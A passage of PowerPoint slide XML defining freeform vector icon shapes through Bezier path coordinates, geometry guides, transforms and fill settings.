                <a:gd name="T12" fmla="*/ 51 w 293"/>
                <a:gd name="T13" fmla="*/ 146 h 326"/>
                <a:gd name="T14" fmla="*/ 51 w 293"/>
                <a:gd name="T15" fmla="*/ 180 h 326"/>
                <a:gd name="T16" fmla="*/ 147 w 293"/>
                <a:gd name="T17" fmla="*/ 276 h 326"/>
                <a:gd name="T18" fmla="*/ 243 w 293"/>
                <a:gd name="T19" fmla="*/ 180 h 326"/>
                <a:gd name="T20" fmla="*/ 243 w 293"/>
                <a:gd name="T21" fmla="*/ 146 h 326"/>
                <a:gd name="T22" fmla="*/ 147 w 293"/>
                <a:gd name="T23" fmla="*/ 50 h 326"/>
                <a:gd name="T24" fmla="*/ 102 w 293"/>
                <a:gd name="T25" fmla="*/ 61 h 326"/>
                <a:gd name="T26" fmla="*/ 68 w 293"/>
                <a:gd name="T27" fmla="*/ 50 h 326"/>
                <a:gd name="T28" fmla="*/ 79 w 293"/>
                <a:gd name="T29" fmla="*/ 16 h 326"/>
                <a:gd name="T30" fmla="*/ 147 w 293"/>
                <a:gd name="T31" fmla="*/ 0 h 326"/>
                <a:gd name="T32" fmla="*/ 293 w 293"/>
                <a:gd name="T33" fmla="*/ 146 h 326"/>
                <a:gd name="T34" fmla="*/ 293 w 293"/>
                <a:gd name="T35" fmla="*/ 180 h 326"/>
                <a:gd name="T36" fmla="*/ 147 w 293"/>
                <a:gd name="T37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3" h="326">
                  <a:moveTo>
                    <a:pt x="147" y="326"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="326"/>
                    <a:pt x="0" y="261"/>
                    <a:pt x="0" y="18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19"/>
                    <a:pt x="8" y="92"/>
                    <a:pt x="22" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="58"/>
                    <a:pt x="45" y="54"/>
                    <a:pt x="57" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="69"/>
                    <a:pt x="72" y="84"/>
                    <a:pt x="65" y="96"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="111"/>
                    <a:pt x="51" y="128"/>
                    <a:pt x="51" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="180"/>
                    <a:pt x="51" y="180"/>
                    <a:pt x="51" y="180"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="233"/>
                    <a:pt x="94" y="276"/>
                    <a:pt x="147" y="276"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="276"/>
                    <a:pt x="243" y="233"/>
                    <a:pt x="243" y="180"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="243" y="146"/>
                    <a:pt x="243" y="146"/>
                    <a:pt x="243" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="243" y="93"/>
                    <a:pt x="200" y="50"/>
                    <a:pt x="147" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="50"/>
                    <a:pt x="116" y="54"/>
                    <a:pt x="102" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="67"/>
                    <a:pt x="75" y="63"/>
                    <a:pt x="68" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="38"/>
                    <a:pt x="67" y="23"/>
                    <a:pt x="79" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="6"/>
                    <a:pt x="123" y="0"/>
                    <a:pt x="147" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227" y="0"/>
                    <a:pt x="293" y="66"/>
                    <a:pt x="293" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="293" y="180"/>
                    <a:pt x="293" y="180"/>
                    <a:pt x="293" y="180"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="293" y="261"/>
                    <a:pt x="227" y="326"/>
                    <a:pt x="147" y="3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FFBC9D67-D6B4-D24F-936F-81D7FF2626DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8433580" y="3540937"/>
            <a:ext cx="365095" cy="364223"/>
            <a:chOff x="8427983" y="3189038"/>
            <a:chExt cx="365095" cy="364223"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="174" name="Freeform 276">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{879A86BF-366D-0E4A-8594-AC7BB613B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732" y="3189038"/>
              <a:ext cx="126346" cy="126346"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 371 w 548"/>
                <a:gd name="T1" fmla="*/ 549 h 549"/>
                <a:gd name="T2" fmla="*/ 371 w 548"/>
                <a:gd name="T3" fmla="*/ 549 h 549"/>
                <a:gd name="T4" fmla="*/ 353 w 548"/>
                <a:gd name="T5" fmla="*/ 541 h 549"/>
                <a:gd name="T6" fmla="*/ 307 w 548"/>
                <a:gd name="T7" fmla="*/ 496 h 549"/>
                <a:gd name="T8" fmla="*/ 307 w 548"/>
                <a:gd name="T9" fmla="*/ 460 h 549"/>
                <a:gd name="T10" fmla="*/ 343 w 548"/>
                <a:gd name="T11" fmla="*/ 460 h 549"/>
                <a:gd name="T12" fmla="*/ 371 w 548"/>
                <a:gd name="T13" fmla="*/ 488 h 549"/>
                <a:gd name="T14" fmla="*/ 463 w 548"/>
                <a:gd name="T15" fmla="*/ 395 h 549"/>
                <a:gd name="T16" fmla="*/ 498 w 548"/>
                <a:gd name="T17" fmla="*/ 311 h 549"/>
                <a:gd name="T18" fmla="*/ 463 w 548"/>
                <a:gd name="T19" fmla="*/ 228 h 549"/>
                <a:gd name="T20" fmla="*/ 321 w 548"/>
                <a:gd name="T21" fmla="*/ 85 h 549"/>
                <a:gd name="T22" fmla="*/ 153 w 548"/>
                <a:gd name="T23" fmla="*/ 85 h 549"/>
                <a:gd name="T24" fmla="*/ 61 w 548"/>
                <a:gd name="T25" fmla="*/ 178 h 549"/>
                <a:gd name="T26" fmla="*/ 268 w 548"/>
                <a:gd name="T27" fmla="*/ 385 h 549"/>
                <a:gd name="T28" fmla="*/ 268 w 548"/>
                <a:gd name="T29" fmla="*/ 420 h 549"/>
                <a:gd name="T30" fmla="*/ 232 w 548"/>
                <a:gd name="T31" fmla="*/ 420 h 549"/>
                <a:gd name="T32" fmla="*/ 7 w 548"/>
                <a:gd name="T33" fmla="*/ 196 h 549"/>
                <a:gd name="T34" fmla="*/ 0 w 548"/>
                <a:gd name="T35" fmla="*/ 178 h 549"/>
                <a:gd name="T36" fmla="*/ 7 w 548"/>
                <a:gd name="T37" fmla="*/ 160 h 549"/>
                <a:gd name="T38" fmla="*/ 118 w 548"/>
                <a:gd name="T39" fmla="*/ 50 h 549"/>
                <a:gd name="T40" fmla="*/ 237 w 548"/>
                <a:gd name="T41" fmla="*/ 0 h 549"/>
                <a:gd name="T42" fmla="*/ 357 w 548"/>
                <a:gd name="T43" fmla="*/ 50 h 549"/>
                <a:gd name="T44" fmla="*/ 499 w 548"/>
                <a:gd name="T45" fmla="*/ 192 h 549"/>
                <a:gd name="T46" fmla="*/ 548 w 548"/>
                <a:gd name="T47" fmla="*/ 311 h 549"/>
                <a:gd name="T48" fmla="*/ 499 w 548"/>
                <a:gd name="T49" fmla="*/ 431 h 549"/>
                <a:gd name="T50" fmla="*/ 388 w 548"/>
                <a:gd name="T51" fmla="*/ 541 h 549"/>
                <a:gd name="T52" fmla="*/ 371 w 548"/>
                <a:gd name="T53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8" h="549">
                  <a:moveTo>
                    <a:pt x="371" y="549"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="371" y="549"/>
                    <a:pt x="371" y="549"/>
                    <a:pt x="371" y="549"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="364" y="549"/>
                    <a:pt x="357" y="546"/>
                    <a:pt x="353" y="541"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="307" y="496"/>
                    <a:pt x="307" y="496"/>
                    <a:pt x="307" y="496"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="297" y="486"/>
                    <a:pt x="297" y="470"/>
                    <a:pt x="307" y="460"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="317" y="450"/>
                    <a:pt x="333" y="450"/>
                    <a:pt x="343" y="460"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="371" y="488"/>
                    <a:pt x="371" y="488"/>
                    <a:pt x="371" y="488"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="463" y="395"/>
                    <a:pt x="463" y="395"/>
                    <a:pt x="463" y="395"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="485" y="373"/>
                    <a:pt x="498" y="343"/>
                    <a:pt x="498" y="311"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="498" y="280"/>
                    <a:pt x="485" y="250"/>
                    <a:pt x="463" y="228"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="321" y="85"/>
                    <a:pt x="321" y="85"/>
                    <a:pt x="321" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="276" y="41"/>
                    <a:pt x="198" y="41"/>
                    <a:pt x="153" y="85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268" y="385"/>
                    <a:pt x="268" y="385"/>
                    <a:pt x="268" y="385"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="278" y="394"/>
                    <a:pt x="278" y="411"/>
                    <a:pt x="268" y="420"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="258" y="430"/>
                    <a:pt x="242" y="430"/>
                    <a:pt x="232" y="420"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="196"/>
                    <a:pt x="7" y="196"/>
                    <a:pt x="7" y="196"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="191"/>
                    <a:pt x="0" y="185"/>
                    <a:pt x="0" y="178"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="171"/>
                    <a:pt x="2" y="165"/>
                    <a:pt x="7" y="16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49" y="18"/>
                    <a:pt x="192" y="0"/>
                    <a:pt x="237" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="282" y="0"/>
                    <a:pt x="325" y="18"/>
                    <a:pt x="357" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="499" y="192"/>
                    <a:pt x="499" y="192"/>
                    <a:pt x="499" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="531" y="224"/>
                    <a:pt x="548" y="266"/>
                    <a:pt x="548" y="311"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="548" y="357"/>
                    <a:pt x="531" y="399"/>
                    <a:pt x="499" y="431"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="388" y="541"/>
                    <a:pt x="388" y="541"/>
                    <a:pt x="388" y="541"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="384" y="546"/>
                    <a:pt x="377" y="549"/>
                    <a:pt x="371" y="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75" name="Line 277">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE10DE83-16A5-EB40-B5F6-104DD4424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5118" y="3435629"/>
              <a:ext cx="0" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:grpFill/>
            <a:ln w="22225" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="555557"/>
              </a:solidFill>
              <a:prstDash val="solid"/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76" name="Freeform 278">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2CC76A3-E8AC-E040-9F3E-40F8AA51B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749" y="3236091"/>
              <a:ext cx="261404" cy="207381"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 607 w 1134"/>
                <a:gd name="T1" fmla="*/ 898 h 898"/>
                <a:gd name="T2" fmla="*/ 589 w 1134"/>
                <a:gd name="T3" fmla="*/ 891 h 898"/>
                <a:gd name="T4" fmla="*/ 589 w 1134"/>
                <a:gd name="T5" fmla="*/ 855 h 898"/>
                <a:gd name="T6" fmla="*/ 1071 w 1134"/>
                <a:gd name="T7" fmla="*/ 373 h 898"/>
                <a:gd name="T8" fmla="*/ 761 w 1134"/>
                <a:gd name="T9" fmla="*/ 64 h 898"/>
                <a:gd name="T10" fmla="*/ 45 w 1134"/>
                <a:gd name="T11" fmla="*/ 779 h 898"/>
                <a:gd name="T12" fmla="*/ 9 w 1134"/>
                <a:gd name="T13" fmla="*/ 779 h 898"/>
                <a:gd name="T14" fmla="*/ 9 w 1134"/>
                <a:gd name="T15" fmla="*/ 744 h 898"/>
                <a:gd name="T16" fmla="*/ 743 w 1134"/>
                <a:gd name="T17" fmla="*/ 10 h 898"/>
                <a:gd name="T18" fmla="*/ 779 w 1134"/>
                <a:gd name="T19" fmla="*/ 10 h 898"/>
                <a:gd name="T20" fmla="*/ 1125 w 1134"/>
                <a:gd name="T21" fmla="*/ 356 h 898"/>
                <a:gd name="T22" fmla="*/ 1125 w 1134"/>
                <a:gd name="T23" fmla="*/ 391 h 898"/>
                <a:gd name="T24" fmla="*/ 625 w 1134"/>
                <a:gd name="T25" fmla="*/ 891 h 898"/>
                <a:gd name="T26" fmla="*/ 607 w 1134"/>
                <a:gd name="T27" fmla="*/ 89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4" h="898">
                  <a:moveTo>
                    <a:pt x="607" y="898"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="601" y="898"/>
                    <a:pt x="594" y="896"/>
                    <a:pt x="589" y="891"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="579" y="881"/>
                    <a:pt x="579" y="865"/>
                    <a:pt x="589" y="855"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1071" y="373"/>
                    <a:pt x="1071" y="373"/>
                    <a:pt x="1071" y="373"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="761" y="64"/>
                    <a:pt x="761" y="64"/>
                    <a:pt x="761" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="779"/>
                    <a:pt x="45" y="779"/>
                    <a:pt x="45" y="779"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="789"/>
                    <a:pt x="19" y="789"/>
                    <a:pt x="9" y="779"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="770"/>
                    <a:pt x="0" y="754"/>
                    <a:pt x="9" y="744"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="743" y="10"/>
                    <a:pt x="743" y="10"/>
                    <a:pt x="743" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="753" y="0"/>
                    <a:pt x="769" y="0"/>
                    <a:pt x="779" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1125" y="356"/>
                    <a:pt x="1125" y="356"/>
                    <a:pt x="1125" y="356"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1134" y="365"/>
                    <a:pt x="1134" y="382"/>
                    <a:pt x="1125" y="391"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="625" y="891"/>
                    <a:pt x="625" y="891"/>
                    <a:pt x="625" y="891"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="620" y="896"/>
                    <a:pt x="614" y="898"/>
                    <a:pt x="607" y="8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77" name="Line 279">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F5738DB-D21B-FE4F-8EE6-AB8D7265F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44744" y="3466126"/>
              <a:ext cx="0" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:grpFill/>
            <a:ln w="22225" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="555557"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln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78" name="Freeform 280">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{897D2D9A-2448-6348-B22A-E5EDEF0DF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3913" y="3447828"/>
              <a:ext cx="49667" cy="48795"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 28 w 215"/>
                <a:gd name="T1" fmla="*/ 212 h 212"/>
                <a:gd name="T2" fmla="*/ 10 w 215"/>
                <a:gd name="T3" fmla="*/ 205 h 212"/>
                <a:gd name="T4" fmla="*/ 10 w 215"/>
                <a:gd name="T5" fmla="*/ 169 h 212"/>
                <a:gd name="T6" fmla="*/ 170 w 215"/>
                <a:gd name="T7" fmla="*/ 10 h 212"/>
                <a:gd name="T8" fmla="*/ 205 w 215"/>
                <a:gd name="T9" fmla="*/ 10 h 212"/>
                <a:gd name="T10" fmla="*/ 205 w 215"/>
                <a:gd name="T11" fmla="*/ 45 h 212"/>
                <a:gd name="T12" fmla="*/ 46 w 215"/>
                <a:gd name="T13" fmla="*/ 205 h 212"/>
                <a:gd name="T14" fmla="*/ 28 w 215"/>
                <a:gd name="T1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212">
                  <a:moveTo>
                    <a:pt x="28" y="212"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="212"/>
                    <a:pt x="15" y="210"/>
                    <a:pt x="10" y="205"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="195"/>
                    <a:pt x="0" y="179"/>
                    <a:pt x="10" y="169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80" y="0"/>
                    <a:pt x="196" y="0"/>
                    <a:pt x="205" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="215" y="20"/>
                    <a:pt x="215" y="36"/>
                    <a:pt x="205" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="205"/>
                    <a:pt x="46" y="205"/>
                    <a:pt x="46" y="205"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="210"/>
                    <a:pt x="34" y="212"/>
                    <a:pt x="28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79" name="Freeform 281">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0962B62C-663D-AA4E-B9D9-DC4C8E849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831" y="3485296"/>
              <a:ext cx="52281" cy="28755"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 28 w 229"/>
                <a:gd name="T1" fmla="*/ 125 h 125"/>
                <a:gd name="T2" fmla="*/ 5 w 229"/>
                <a:gd name="T3" fmla="*/ 109 h 125"/>
                <a:gd name="T4" fmla="*/ 19 w 229"/>
                <a:gd name="T5" fmla="*/ 76 h 125"/>
                <a:gd name="T6" fmla="*/ 190 w 229"/>
                <a:gd name="T7" fmla="*/ 6 h 125"/>
                <a:gd name="T8" fmla="*/ 223 w 229"/>
                <a:gd name="T9" fmla="*/ 19 h 125"/>
                <a:gd name="T10" fmla="*/ 210 w 229"/>
                <a:gd name="T11" fmla="*/ 52 h 125"/>
                <a:gd name="T12" fmla="*/ 38 w 229"/>
                <a:gd name="T13" fmla="*/ 123 h 125"/>
                <a:gd name="T14" fmla="*/ 28 w 229"/>
                <a:gd name="T1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125">
                  <a:moveTo>
                    <a:pt x="28" y="125"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="125"/>
                    <a:pt x="9" y="119"/>
                    <a:pt x="5" y="109"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="96"/>
                    <a:pt x="6" y="82"/>
                    <a:pt x="19" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="6"/>
                    <a:pt x="190" y="6"/>
                    <a:pt x="190" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="0"/>
                    <a:pt x="218" y="6"/>
                    <a:pt x="223" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229" y="32"/>
                    <a:pt x="222" y="47"/>
                    <a:pt x="210" y="52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5" y="124"/>
                    <a:pt x="32" y="125"/>
                    <a:pt x="28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80" name="Freeform 282">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57F98A24-4F5C-D743-8086-66EB4A063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919" y="3500980"/>
              <a:ext cx="33983" cy="20912"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 29 w 145"/>
                <a:gd name="T1" fmla="*/ 90 h 90"/>
                <a:gd name="T2" fmla="*/ 5 w 145"/>
                <a:gd name="T3" fmla="*/ 74 h 90"/>
                <a:gd name="T4" fmla="*/ 19 w 145"/>
                <a:gd name="T5" fmla="*/ 41 h 90"/>
                <a:gd name="T6" fmla="*/ 107 w 145"/>
                <a:gd name="T7" fmla="*/ 5 h 90"/>
                <a:gd name="T8" fmla="*/ 140 w 145"/>
                <a:gd name="T9" fmla="*/ 19 h 90"/>
                <a:gd name="T10" fmla="*/ 126 w 145"/>
                <a:gd name="T11" fmla="*/ 52 h 90"/>
                <a:gd name="T12" fmla="*/ 38 w 145"/>
                <a:gd name="T13" fmla="*/ 88 h 90"/>
                <a:gd name="T14" fmla="*/ 29 w 145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90">
                  <a:moveTo>
                    <a:pt x="29" y="90"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="90"/>
                    <a:pt x="9" y="84"/>
                    <a:pt x="5" y="74"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="61"/>
                    <a:pt x="6" y="47"/>
                    <a:pt x="19" y="41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20" y="0"/>
                    <a:pt x="134" y="6"/>
                    <a:pt x="140" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="32"/>
                    <a:pt x="139" y="47"/>
                    <a:pt x="126" y="52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5" y="89"/>
                    <a:pt x="32" y="90"/>
                    <a:pt x="29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81" name="Freeform 283">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FDCA856-AAFB-B342-97E8-2C06CBCF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7983" y="3406003"/>
              <a:ext cx="88006" cy="147258"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 27 w 383"/>
                <a:gd name="T1" fmla="*/ 641 h 641"/>
                <a:gd name="T2" fmla="*/ 9 w 383"/>
                <a:gd name="T3" fmla="*/ 634 h 641"/>
                <a:gd name="T4" fmla="*/ 3 w 383"/>
                <a:gd name="T5" fmla="*/ 606 h 641"/>
                <a:gd name="T6" fmla="*/ 245 w 383"/>
                <a:gd name="T7" fmla="*/ 19 h 641"/>
                <a:gd name="T8" fmla="*/ 278 w 383"/>
                <a:gd name="T9" fmla="*/ 5 h 641"/>
                <a:gd name="T10" fmla="*/ 292 w 383"/>
                <a:gd name="T11" fmla="*/ 38 h 641"/>
                <a:gd name="T12" fmla="*/ 73 w 383"/>
                <a:gd name="T13" fmla="*/ 569 h 641"/>
                <a:gd name="T14" fmla="*/ 345 w 383"/>
                <a:gd name="T15" fmla="*/ 457 h 641"/>
                <a:gd name="T16" fmla="*/ 378 w 383"/>
                <a:gd name="T17" fmla="*/ 471 h 641"/>
                <a:gd name="T18" fmla="*/ 364 w 383"/>
                <a:gd name="T19" fmla="*/ 504 h 641"/>
                <a:gd name="T20" fmla="*/ 36 w 383"/>
                <a:gd name="T21" fmla="*/ 639 h 641"/>
                <a:gd name="T22" fmla="*/ 27 w 383"/>
                <a:gd name="T23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3" h="641">
                  <a:moveTo>
                    <a:pt x="27" y="641"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="641"/>
                    <a:pt x="14" y="638"/>
                    <a:pt x="9" y="634"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="626"/>
                    <a:pt x="0" y="615"/>
                    <a:pt x="3" y="606"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="245" y="19"/>
                    <a:pt x="245" y="19"/>
                    <a:pt x="245" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="250" y="6"/>
                    <a:pt x="265" y="0"/>
                    <a:pt x="278" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="291" y="10"/>
                    <a:pt x="297" y="25"/>
                    <a:pt x="292" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="569"/>
                    <a:pt x="73" y="569"/>
                    <a:pt x="73" y="569"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="345" y="457"/>
                    <a:pt x="345" y="457"/>
                    <a:pt x="345" y="457"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="358" y="452"/>
                    <a:pt x="373" y="458"/>
                    <a:pt x="378" y="471"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="383" y="484"/>
                    <a:pt x="377" y="499"/>
                    <a:pt x="364" y="504"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="639"/>
                    <a:pt x="36" y="639"/>
                    <a:pt x="36" y="639"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="640"/>
                    <a:pt x="30" y="641"/>
                    <a:pt x="27" y="6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82" name="Freeform 284">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37FD7173-AD8C-8344-A93F-874AAED07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8024" y="3491395"/>
              <a:ext cx="41825" cy="41825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 154 w 182"/>
                <a:gd name="T1" fmla="*/ 179 h 179"/>
                <a:gd name="T2" fmla="*/ 136 w 182"/>
                <a:gd name="T3" fmla="*/ 171 h 179"/>
                <a:gd name="T4" fmla="*/ 10 w 182"/>
                <a:gd name="T5" fmla="*/ 45 h 179"/>
                <a:gd name="T6" fmla="*/ 10 w 182"/>
                <a:gd name="T7" fmla="*/ 10 h 179"/>
                <a:gd name="T8" fmla="*/ 46 w 182"/>
                <a:gd name="T9" fmla="*/ 10 h 179"/>
                <a:gd name="T10" fmla="*/ 172 w 182"/>
                <a:gd name="T11" fmla="*/ 136 h 179"/>
                <a:gd name="T12" fmla="*/ 172 w 182"/>
                <a:gd name="T13" fmla="*/ 171 h 179"/>
                <a:gd name="T14" fmla="*/ 154 w 182"/>
                <a:gd name="T15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79">
                  <a:moveTo>
                    <a:pt x="154" y="179"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="179"/>
                    <a:pt x="141" y="176"/>
                    <a:pt x="136" y="171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0" y="35"/>
                    <a:pt x="0" y="19"/>
                    <a:pt x="10" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="0"/>
                    <a:pt x="36" y="0"/>
                    <a:pt x="46" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="136"/>
                    <a:pt x="172" y="136"/>
                    <a:pt x="172" y="136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="145"/>
                    <a:pt x="182" y="162"/>
                    <a:pt x="172" y="171"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="167" y="176"/>
                    <a:pt x="160" y="179"/>
                    <a:pt x="154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83" name="Freeform 285">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
